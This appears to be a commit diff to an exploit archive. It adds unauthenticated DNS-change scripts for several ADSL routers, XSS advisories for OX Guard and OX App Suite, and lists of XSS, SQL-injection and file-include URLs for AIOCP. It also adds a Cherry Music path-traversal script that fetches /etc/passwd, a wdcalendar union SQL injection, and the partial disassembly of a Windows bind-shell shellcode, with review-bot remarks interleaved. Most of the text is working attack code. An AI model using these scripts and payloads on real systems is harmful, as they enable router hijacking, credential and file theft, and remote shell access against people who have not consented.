# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PLANET VDR-300NU ADSL ROUTER "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
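Review bot: the usage line advertises `<Target> <Primary DNS> <Secondary DNS>` as three required arguments, but the guard accepts two, in which case `$3` expands to nothing and the request carries an empty `dnsSecondary=`; document that the third argument is optional (as the first Example implies) or reject the two-argument form. The arguments are also interpolated into the URL unchecked, so a value containing `&` or whitespace silently changes the query string; a simple pattern test on each argument would give a clear error instead of a malformed request.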

platforms/cgi/webapps/40371.sh Executable file

@ -0,0 +1,82 @@
#!/bin/bash
#
# Tenda ADSL2/2+ Modem 963281TAN
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem 963281TAN "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
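Review bot: files.csv records this entry as platform `cgi`, type `webapps`, port 80, but the script hard-codes `http://$1/` with no port or scheme option, so the port is recorded only in the csv; either accept a URL as the target or state in the header that only plain HTTP on port 80 is covered. The Description and Disclaimer blocks are byte-identical across all six router scripts in this commit, so any correction to that wording (including the "FAKEAV" reference) has to be made in six places.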

platforms/cgi/webapps/40372.sh Executable file

@ -0,0 +1,82 @@
#!/bin/bash
#
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
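Review bot: the argument check `if [[ $# -gt 3 || $# -lt 2 ]]; then` accepts a two-argument invocation (the first usage example shows one), but the request then expands `$3` to nothing and sends `dnsSecondary=`, while the usage line `Usage: $0 <Target> <Primary DNS> <Secondary DNS>` presents the secondary server as mandatory; either document that the secondary is optional and what an empty value does on the device, or default it. The assignment `GET=\`which GET 2>/dev/null\`` is only used for its exit status and the `$GET` variable is never referenced afterwards (the script calls `GET` by name), so `command -v GET >/dev/null 2>&1 || ...` expresses the dependency check more directly.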

platforms/cgi/webapps/40373.sh Executable file

@ -0,0 +1,81 @@
#!/bin/bash
#
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " ASUS DSL-X11 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
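Review bot: the header's Description (`The vulnerability exist in the web interface, which is accessible without authentication.`) spends its length on attacker motives and gives the operator nothing to act on; the defensive counterpart follows directly from the request line and belongs in the header: the vector is a single unauthenticated GET to `/dnscfg.cgi` with `dnsPrimary`, `dnsSecondary` and `dnsRefresh=1` parameters, so exposure ends when the web interface is not reachable from the WAN side, and any hit on that path from outside the LAN is a clear indicator for device logs or an upstream proxy. The sentence also needs "exists" rather than "exist". The same header text is pasted verbatim into the Tenda and COMTREND scripts, so a correction here should be applied to all three.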


@ -0,0 +1,89 @@
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite
Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.
Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
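Review bot: the score in `CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)` for bug 47878 does not match its own vector; that vector (Confidentiality Low only, user interaction required) computes to 4.3 under CVSS v3.0, which is exactly what the two later entries give for the identical vector string, so either the vector or the score is wrong and one of them must be corrected before publication. Minor wording in all three Risk paragraphs: "within a users context" should read "within a user's context", and in the 48080 entry "a active session" should read "an active session".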


@ -0,0 +1,91 @@
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
Steps to reproduce:
1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.
Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub A>>oczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Compose malicious mail with a link containing a "data" schema with JS code included
2. Make a user click the link
Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
Solution:
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.
Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link
Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
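Review bot: all three entries (bug IDs 46484, 46894 and 47062) carry the same line `CVE reference: CVE-2016-5740` although they describe different issues in different components (frontend vs. backend) with different fixed revisions; that looks like a copy-paste slip and each entry's CVE should be re-checked against the assignments before this advisory is archived. Several text defects also need attention: the researcher credit `Jakub A>>oczek` is mojibake from a non-ASCII name and should be re-encoded in UTF-8 rather than left as-is; "ressources" should be "resources"; the sentence "Users should not or interact with mails from untrusted external sources" is missing a verb before "or"; "regulary" should be "regularly" and "A attacker" should be "An attacker". The 47062 Solution paragraph is the only one that does not say what the vendor changed server-side (the other two describe plain-text handling and sanitisation), which operators need in order to confirm they are patched.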


@ -1,9 +1,71 @@
source: http://www.securityfocus.com/bid/20931/info
All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.
AIOCP 1.3.007 and prior versions are vulnerable.
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
Cross-site scripting =
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=23&amp;catid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=3&amp;catid=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_users_online.php?order_field=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-
http://www.example.com/public/code/cp_links_search.php?orderdir=&lt;/textarea&gt;&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Remote File-Include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include )
SQL-Injection =
- http://www.example.com/public/code/cp_dpage.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?news_category=[sql]
-
http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_edit_user.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links.php?links_category=[sql]
- http://www.example.com/public/code/cp_links.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_contact_us.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=[sql]
- http://www.example.com/public/code/cp_login.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_users_online.php?order_field=cpsession_expiry&amp;submitted=1&amp;firstrow=[sql]
-
http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links_search.php?orderdir=[sql]
Full Path Disclosure =
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&amp;aiocp_dp[]=_main
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field[]=
- http://www.example.com/public/code/cp_show_page_help.php?hp[]=
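Review bot: the expanded list contains duplicate entries that should be removed: `http://www.example.com/public/code/cp_forum_view.php?fmode=top&amp;topid=53&amp;forid=...` appears twice in the Cross-site scripting section, and `http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]` appears twice in the SQL-Injection section. The section markers (`Cross-site scripting =`, `Remote File-Include =`, `SQL-Injection =`, `Full Path Disclosure =`) and the orphaned `-` lines in front of wrapped URLs are leftovers of the SecurityFocus page layout cited in `source: http://www.securityfocus.com/bid/20931/info`, and the entries are still HTML-entity encoded (`&amp;`, `&lt;`, `&#039;`) as captured from that page, so the archived file should state that the URLs are shown in encoded form, or normalise them, to avoid confusion about what was actually tested.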

platforms/php/webapps/40361.py Executable file

@ -0,0 +1,36 @@
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)
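Review bot: `session_id` is only bound inside the `for c in cj:` loop when a cookie named `session_id` comes back, so a rejected login does not fail with a message but with a `NameError` at `opener.addheaders.append(('Cookie', 'session_id=' + session_id))`; a check after the loop ("login failed") would make the failure mode explicit. The second `urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))` already replays every cookie in the jar, so the hand-built `Cookie` header duplicates what the cookie processor sends. The header should also state that the script is Python 2 only (`urllib2`, `cookielib`). From the defensive side the request body is informative: the `download` endpoint accepts a JSON array under `value`, and here the element is the absolute path `/etc/passwd`, so a rule that flags `download` requests whose `value` entries begin with `/` or contain `..` covers this CVE-2015-8309 pattern on unpatched 0.35.1 installs.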

platforms/php/webapps/40364.txt Executable file

@ -0,0 +1,32 @@
# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps
* Affected file -> edit.php and edit.db.php
* Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
* Vulnerable code:
function getCalendarByRange($id){
try{
$db = new DBConnection();
$db->getConnection();
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
variable is not filtered properly
$handle = mysql_query($sql);
//echo $sql;
$row = mysql_fetch_object($handle);
}catch(Exception $e){
}
return $row;
}
if($_GET["id"]){
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly
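Review bot: the "Vulnerable code" excerpt has been wrapped mid-line in two places, `$sql = "select * from \`jqcalendar\` where \`id\` = " . $id; //the` followed by `variable is not filtered properly` on its own line, and again after `getCalendarByRange($_GET["id"]); //the variable is not filtered`, so the continuation lines are no longer comments and the snippet no longer parses as PHP; rejoin them before archiving. The excerpt does show the root cause clearly: the `id` query parameter is concatenated straight into the SQL string, and the fix is either `(int)$id` (the column is an integer id) or a prepared statement. Two secondary points a maintainer should see: `$row` is never initialised, so the `return $row;` after a caught exception returns an undefined variable, and the `mysql_*` functions used here were removed in PHP 7, so any fix will need `mysqli` or PDO anyway.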


@ -0,0 +1,736 @@
/*
# Title : Windows x86 password protected bind shell tcp shellcode
# Date : 12-09-2016
# Author : Roziul Hasan Khan Shifat
# size : 637 bytes
# Tested On : Windows 7 ultimate x86 x64
# Email : shifath12@gmail.com
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 99 cltd
1: 64 8b 42 30 mov %fs:0x30(%edx),%eax
5: 8b 40 0c mov 0xc(%eax),%eax
8: 8b 70 14 mov 0x14(%eax),%esi
b: ad lods %ds:(%esi),%eax
c: 96 xchg %eax,%esi
d: ad lods %ds:(%esi),%eax
e: 8b 78 10 mov 0x10(%eax),%edi
11: 8b 5f 3c mov 0x3c(%edi),%ebx
14: 01 fb add %edi,%ebx
16: 8b 5b 78 mov 0x78(%ebx),%ebx
19: 01 fb add %edi,%ebx
1b: 8b 73 20 mov 0x20(%ebx),%esi
1e: 01 fe add %edi,%esi
00000020 <g>:
20: 42 inc %edx
21: ad lods %ds:(%esi),%eax
22: 01 f8 add %edi,%eax
24: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2a: 75 f4 jne 20 <g>
2c: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
33: 75 eb jne 20 <g>
35: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3c: 75 e2 jne 20 <g>
3e: 8b 73 1c mov 0x1c(%ebx),%esi
41: 01 fe add %edi,%esi
43: 8b 0c 96 mov (%esi,%edx,4),%ecx
46: 01 f9 add %edi,%ecx
48: 83 ec 50 sub $0x50,%esp
4b: 8d 34 24 lea (%esp),%esi
4e: 89 0e mov %ecx,(%esi)
50: 99 cltd
51: 68 73 41 41 41 push $0x41414173
56: 88 54 24 02 mov %dl,0x2(%esp)
5a: 68 6f 63 65 73 push $0x7365636f
5f: 68 74 65 50 72 push $0x72506574
64: 68 43 72 65 61 push $0x61657243
69: 8d 14 24 lea (%esp),%edx
6c: 52 push %edx
6d: 57 push %edi
6e: ff d1 call *%ecx
70: 83 c4 10 add $0x10,%esp
73: 89 46 04 mov %eax,0x4(%esi)
76: 99 cltd
77: 68 65 73 73 41 push $0x41737365
7c: 88 54 24 03 mov %dl,0x3(%esp)
80: 68 50 72 6f 63 push $0x636f7250
85: 68 45 78 69 74 push $0x74697845
8a: 8d 14 24 lea (%esp),%edx
8d: 52 push %edx
8e: 57 push %edi
8f: ff 16 call *(%esi)
91: 83 c4 0c add $0xc,%esp
94: 89 46 08 mov %eax,0x8(%esi)
97: 99 cltd
98: 52 push %edx
99: 68 61 72 79 41 push $0x41797261
9e: 68 4c 69 62 72 push $0x7262694c
a3: 68 4c 6f 61 64 push $0x64616f4c
a8: 8d 14 24 lea (%esp),%edx
ab: 52 push %edx
ac: 57 push %edi
ad: ff 16 call *(%esi)
af: 83 c4 0c add $0xc,%esp
b2: 99 cltd
b3: 68 6c 6c 6c 6c push $0x6c6c6c6c
b8: 88 54 24 02 mov %dl,0x2(%esp)
bc: 68 33 32 2e 64 push $0x642e3233
c1: 68 77 73 32 5f push $0x5f327377
c6: 8d 14 24 lea (%esp),%edx
c9: 52 push %edx
ca: ff d0 call *%eax
cc: 83 c4 0c add $0xc,%esp
cf: 97 xchg %eax,%edi
d0: 8b 5f 3c mov 0x3c(%edi),%ebx
d3: 01 fb add %edi,%ebx
d5: 8b 5b 78 mov 0x78(%ebx),%ebx
d8: 01 fb add %edi,%ebx
da: 8b 5b 1c mov 0x1c(%ebx),%ebx
dd: 01 fb add %edi,%ebx
df: 99 cltd
e0: 66 ba c8 01 mov $0x1c8,%dx
e4: 8b 04 13 mov (%ebx,%edx,1),%eax
e7: 01 f8 add %edi,%eax
e9: 89 46 0c mov %eax,0xc(%esi)
ec: 8b 43 50 mov 0x50(%ebx),%eax
ef: 01 f8 add %edi,%eax
f1: 89 46 10 mov %eax,0x10(%esi)
f4: 8b 43 04 mov 0x4(%ebx),%eax
f7: 01 f8 add %edi,%eax
f9: 89 46 14 mov %eax,0x14(%esi)
fc: 8b 03 mov (%ebx),%eax
fe: 01 f8 add %edi,%eax
100: 89 46 18 mov %eax,0x18(%esi)
103: 8b 43 30 mov 0x30(%ebx),%eax
106: 01 f8 add %edi,%eax
108: 89 46 1c mov %eax,0x1c(%esi)
10b: 8b 43 08 mov 0x8(%ebx),%eax
10e: 01 f8 add %edi,%eax
110: 89 46 20 mov %eax,0x20(%esi)
113: 8b 43 3c mov 0x3c(%ebx),%eax
116: 01 f8 add %edi,%eax
